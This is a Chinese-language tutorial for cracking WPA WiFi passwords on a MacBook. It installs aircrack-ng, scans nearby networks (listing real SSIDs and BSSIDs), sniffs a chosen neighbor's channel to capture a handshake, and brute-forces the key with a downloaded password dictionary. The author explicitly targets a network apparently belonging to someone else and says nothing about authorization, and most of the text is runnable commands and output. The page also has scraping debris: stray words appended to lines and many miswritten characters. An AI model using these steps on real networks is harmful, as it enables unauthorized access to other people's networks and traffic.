MACBOOK 破解wifi密碼
Table of Contents
1 安裝homebrew
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
2 安裝aircrack-ng
sudo brew install aircrack-ng
安裝時可能會遇到相關路徑操做權限不足的問題,根據提示,直接複製命令執行,例如:python
sudo chown -R $(whoami) /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages chmod u+w /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages
安裝完成後,在使用時須要指定絕對路徑來調用 aircrack-ng ,此時爲了方便,作如下操做:git
# 建立路徑 halberd:bin halberd$ sudo mkdir -p /usr/local/sbin # 修改路徑的屬組 halberd:bin halberd$ sudo chown -R halberd:admin /usr/local/sbin # 創建文件鏈接 halberd:bin halberd$ brew link aircrack-ng Linking /usr/local/Cellar/aircrack-ng/1.5.2... 54 symlinks created
後面就能夠直接調用 aircrack-ng及相關命令了。github
3 獲取wifi網卡信息
左鍵單南wifi圖標:shell
在下拉框中選擇 "Open Network Preference":ruby
隨後點遷wifi後,點選右側框的"Advanced":curl
接下來在新的窗口中選擇hardware 查看MAC地址:測試
找到mac地址後, 查看網卡設備名:url
ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1
結果以下:spa
halberd:tmp halberd$ ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1 en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 ether 98:5a:eb:8b:e1:9e nd6 options=201<PERFORMNUD,DAD> media: autoselect (<unknown type>) status: inactive en1: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
由此肯定wifi網卡的設備名是en0.3d
4 獲取全部可識別的wifi信息
halberd:tmp halberd$ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s Password: SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group) 3號直播間 dc:16:b2:5b:c9:9c -84 157 Y CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES) AIHZ WaveLAN Network 54:a2:74:2d:8a:5f -79 149 Y CN WPA2(PSK/AES/AES) klbblm-sj 48:7d:2e:5e:76:7d -75 149 Y CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES) ChinaNet-QpNr 18:75:32:ad:25:d1 -58 9 Y -- WPA(PSK/AES,TKIP/TKIP) PublicRD 08:57:00:67:3a:c0 -67 6,+1 Y -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES) PublicRD03 34:96:72:a4:e1:ff -42 6,-1 Y CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES) Leave-me-alone 3c:46:d8:69:c9:9d -31 6,-1 Y -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES) AIHZ WaveLAN Network 54:a2:74:2d:8a:50 -53 1 Y CN WPA2(PSK/AES/AES) celled_yang dc:fe:18:c6:62:fd -60 1,+1 Y CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES) klbblm-dn 48:7d:2e:5e:76:7b -58 11,-1 Y CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES) zzz 70:af:6a:00:63:c6 -75 11,-1 Y -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES) 2號直播間 48:7d:2e:51:ea:9c -68 11 Y -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
其中特別注意的是channel ,後面的步驟須要用到。這裏我將破解3號直接間的wifi密碼, 對應的channel 是157。
5 監聽wifi登陸信息
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 157
當執行以上命令, 開始監聽之後, wifi的圖標會發生改變, 變成一個小眼睛同樣的圖標:
在監聽過程當中,假若有人登陸了該wifi, airport會將監聽到的包信息獲取到本地,並保存在/tmp路徑中。 文件命名格式爲: airportSniffxxxx.cap ,在監聽過程當中可隨時查看/tmp最新生成的文件 大小。能夠多監聽一斷時間,只要有人登陸, 密碼信息就會被保存起來。
當獲取了信息後,可使用 Ctrl-c 取消監聽。
在測試過程當中,出現了 Segmentation fault: 11 錯誤,有多是空指針問題。待解決。
6 查看是否獲取handshake信息
sudo aircrack-ng /tmp/airportSniff8g0Oex.cap
若是沒有,則繼續執行上一步操做,繼續監聽。
7 獲取密碼字典
能夠去github上搜索密碼字典,好比搜索 "爆破"。 也能夠直接從https://github.com/rootphantomer/Blasting_dictionary 中下載,進行嘗試。
8 破解
sudo aircrack-ng -w <密碼文件> -b <BSSID> <監聽信息文件>
破解完成後, 程序會輸出 "KEY FOUND! [xxxxxx]" [] 裏的就是密碼。
若是沒破解出來,能夠換個字典繼續嘗試破解。